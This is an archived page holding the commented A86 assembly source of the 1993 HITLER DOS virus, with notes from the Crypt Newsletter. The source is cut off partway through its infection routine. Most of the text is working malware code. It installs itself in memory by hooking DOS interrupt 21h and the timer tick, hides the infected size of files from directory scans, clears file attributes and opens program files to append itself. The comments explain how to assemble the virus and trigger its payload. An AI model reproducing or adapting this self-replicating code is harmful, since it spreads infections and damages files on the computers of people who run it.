home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hackers Underworld 2: Forbidden Knowledge
/
Hackers Underworld 2: Forbidden Knowledge.iso
/
VIRUS
/
HITLER.A86
< prev
next >
Wrap
Text File
|
1993-01-05
|
39KB
|
719 lines
;The HITLER virus: commented in a rough 'n' ready way by the
;Crypt Newsletter staff for issue #11, January 1993.
;The HITLER virus is a memory resident .COM infector which adds itself
;to the end of infected files. HITLER employs
;minimal directory stealth.
;The minimal stealth allows the virus to subtract its file size from
;infected targets when the user takes a look at them using "dir"
;functions while the virus is in memory.
;Most of HITLER's code is devoted to a huge data table which is a voice
;sample of some nut shouting "HITLER." The virus ties the effect to
;the timer tick function, but if you want to hear it immediately, change the
;source were indicated. The resulting code will assemble under A86. On
;execution the virus will lock the PC into the voice effect until reboot,
;rendering it uninfective, if annoying. Not all PC's can generate the
;HITLER sound effect - some will just buzz.
call rakett ; recalculate offset
old db '═ É!¡' ; virus identification marker
rakett: pop bp
push bp
add bp,-103h
mov ax,42ABh ; check if virus installed
int 21h
jnc failed ; exit if here
cli
mov ax,3521h
int 21h ; get interrupt vector
mov w [bp+offset old21],bx ; es:bx points to
mov w [bp+offset old21+2],es ; interrupt handler
mov al,1Ch
int 21h
cli
mov w [bp+offset old1C],bx ; access timer tick int.
mov w [bp+offset old1C+2],es
mov w [bp+offset teller],16380 ; stuff our value into
sti ; "teller" buffer for
; later
call normalspeed ; eh?
mov si,ds
std
lodsb
cld
mov ds,si
xor bx,bx
mov cx,pgf
cmp b [bx],'Z'
jne failed
mov ax,[bx+3]
sub ax,cx
jc failed
mov [bx+3],ax
sub [bx+12h],cx
mov es,[bx+12h]
push cs
pop ds
mov di,100h
mov si,bp
add si,di
mov cx,size
rep movsb
push es
pop ds
mov ax,2521h
mov dx,offset ni21 ; set int 21 route through virus
int 21h
mov al,1Ch
mov dx,offset ni1C ; revector timer tick through
int 21h ; virus
failed: push cs
push cs
pop ds
pop es
pop si
mov di,100h
push di
movsw
movsw
movsb
mov cx,0FFh
mov si,100h
ret ; exit to host
findFCB: popf
call int21 ; look to virus "stealth"
pushf ; routine, now that int 21
or al,al ; comes through virus
jnz backFCB
call stealth
backFCB: popf
iret
stealth: push ax ; the following essentially massages the
push bx ; file control block on directory scans,
push dx ; subtracting the virus size from infected
push es ; files before the user sees 'em
mov ah,2Fh ; get disk transfer address
call int21 ;
cmp byte es:[bx],0FFh ; failed?
jne normFCB ; no, everything still OK
add bx,8
normFCB: mov al,byte es:[bx+16h] ; retrieve seconds attribute
and al,31 ; from observed file, if it's
xor al,31 ; 31, the file is infected
jnz shitFCB ; not 31 - file not infected
mov ax,word es:[bx+1Ch]
mov dx,word es:[bx+1Ch+2]
sub ax,size ; subtract virus length from
sbb dx,0 ; infected file
jc shitFCB ; no files? exit
mov word es:[bx+1Ch],ax
mov word es:[bx+1Ch+2],dx
shitFCB: ; restore everything as normal
pop es
pop dx
pop bx
pop ax
ret
ni21: pushf
cmp ah,11h ; any user access of the file control
je findFCB ; block must come through virus
cmp ah,12h ; ditto for here
je findFCB
cmp ax,42ABh ;
jne not_42AB
popf
clc
retf 2
not_42AB:
cmp ax,4B00h ; is a program being loaded?
jne not_4B00 ; exit if not
call install_24 ; install critical error handler
push ax
push bx
push cx
push dx
push ds
push bp
mov ax,4300h ; get file attributes of potential host
call int21
jc back1 ; failed? exit
mov cs:old_attr,cx ; stash attributes here
test cl,4 ; is the potential host a system file?
jnz back1 ; yes? so exit
mov ax,4301h ; set new file attributes, read or write
xor cx,cx
call int21
jc back1 ; error? exit
push dx
push ds
call infect ; begin infection stuff
pop ds
pop dx
mov ax,4301h
db 0B9h ;mov CX,...
old_attr dw 0
call int21
back1: ;go here if the attrib-get fails
pop bp
pop ds
pop dx
pop cx
pop bx
pop ax
call remove_24 ; normalize critical error handler
not_4B00:
back: popf
db 0EAh
old21 dw 0,0
int21: pushf
call dword ptr cs:old21
ret
infect: mov ax,3D02h ; open host file with read/write access
call int21
jnc okay_open
bad1: ret ; was there an error? exit
okay_open: xchg bx,ax
mov ax,5700h ; get file date and file time
call int21
push cx
mov bp,sp
push dx
mov ah,3Fh ; read first five bytes from potential host
mov cx,5
mov dx,offset old ; store them here
push cs
pop ds
call int21
jc close